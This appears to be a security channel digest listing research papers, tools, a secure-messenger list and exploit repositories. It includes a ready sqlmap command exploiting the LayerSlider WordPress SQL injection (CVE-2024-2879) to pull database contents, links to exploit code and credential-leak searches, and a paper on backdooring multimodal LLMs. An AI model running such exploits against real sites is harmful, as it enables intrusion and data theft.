Vuln_Hunting_WDM.pdf
1.8 MB
#tools
#Threat_Research
"Enhanced Vulnerability Hunting in WDM Drivers Using Symbolic Execution and Taint Analysis", 2023.
]-> tool to hunt vulns in x64 WDM drivers:
https://github.com/zeze-zeze/ioctlance
Cookie_analysis.pdf
810.7 KB
#Research
"Automated Large-Scale Analysis of Cookie Notice Compliance", 2024.
]-> CookieBlock Browser Extension:
https://github.com/dibollinger/CookieBlock
ChkUp.pdf
916.4 KB
#Threat_Research
"Your Firmware Has Arrived: A Study of Firmware Update Vulnerabilities", 2023.
]-> https://fw-chkup.github.io
SoK.pdf
581.7 KB
#Fuzzing
#Research
"SoK: Prudent Evaluation Practices for Fuzzing", 2024.
]-> https://github.com/fuzz-evaluator
]-> Fuzzing Evaluation Guidelines:
https://github.com/fuzz-evaluator/guidelines
cyber_chi.pdf
1.7 MB
#Analytics
#Threat_Research
"China’s Cyber Revenge
Why the PRC Fails to Back Its Claims of Western Espionage", 2024.
TestTime_attacks.pdf
4.8 MB
#MLSecOps
"Test-Time Backdoor Attacks on Multimodal Large Language Models", 2024.
]-> https://github.com/sail-sg/AnyDoor
Evaluating_forensic_tools.pdf
579 KB
#Whitepaper
"Evaluating the Efficacy of Network Forensic Tools: A Comparative Analysis of Snort, Suricata, and Zeek in Addressing Cyber Vulnerabilities", 2024.
NIST_SP800_55v1.pdf
896.3 KB
#Infosec_Standards
NIST SP 800-55 v.1:
"Measurement Guide for Information Security", 2024.
Vol.1 - Identifying and Selecting Measures
Vol.2 - Developing an Information Security Measurement Program
KernelGPT.pdf
3.5 MB
"KernelGPT: Enhanced Kernel Fuzzing via Large Language Models", 2024.
]-> https://github.com/kernelslacker/trinity
KeyTrap in DNS (CVE-2023-50387)
https://github.com/knqyf263/CVE-2023-50387?tab=readme-ov-file
Some secure IM options:
1. E2EE + open source
Session
Delta Chat
Simplex Chat
Silence
Wire
Safe Text
2. Matrix clients
Element
Syphon
Cinny
FluffyChat
SchildiChat
3. Usable offline (mesh networking)
berty
dIM Chat
Rumble
Serval Mesh
FireChat
Meshenger
Berkanan
Mesh
4. Tor-based
Tinfoil Chat
Ricochet Refresh
Briar
Tox
Speek
cwtch.im
5. Blockchain
Status
Mixin
Adamant
iMe Messenger & Crypto Wallet
6. Forks
Molly (Signal)
DarkMessenger (Conversations)
aTox 0.6.0 (Tox)
Taranis (Jami)
7. VOIP/SIP/video calls
Jami
Pryvate Now
Rocket.Chat
Jitsi Meet
Sipnetic
Linphone
8. XMPP (OTR/OMEMO)
Conversations
CoyIM
Dino.
Pidgin
Gajim
blabber
Beagle
MirandaNG
Wime
ChatSecure
(The full list is here: https://omemo.top/).
#tools
#exploit
1. CVE-2024-1346:
Weak MySQL database root password in LaborOfficeFree
https://github.com/PeterGabaldon/CVE-2024-1346
2. A modern dashboard exploit for MS Xbox
https://github.com/XboxDev/endgame-exploit
CVE-2024-2879: LayerSlider plugin for WordPress
LayerSlider versions 7.9.11 - 7.10.0 - Unauthenticated SQL Injection
Insufficient escaping allows additional SQL queries to be appended to existing ones; as a result, it can be used to extract confidential information from the database.
POC usage:
sqlmap "https://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=" --risk=3 --level=4 --dbms=mysql --technique=T
or
sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T
#wordpress
Bypassing anti-reversing defences in iOS applications
https://twelvesec.com/2023/10/10/bypassing-anti-reversing-defences-in-ios-applications/
A walkthrough on dynamically bypassing anti-debugging and anti-reversing defences in iOS applications.
OSINT Method for Map Investigations.
➡️ https://redteamrecipe.com/osint-method-for-map-investigations
#OSINT
These simple instructions show how to search for leaked credentials on a website using Google Chrome's Developer Tools (and anything else using #regex).
https://github.com/h4x0r-dz/Leaked-Credentials/
Contributor twitter.com/h4x0r_dz
Tip by twitter.com/RootMoksha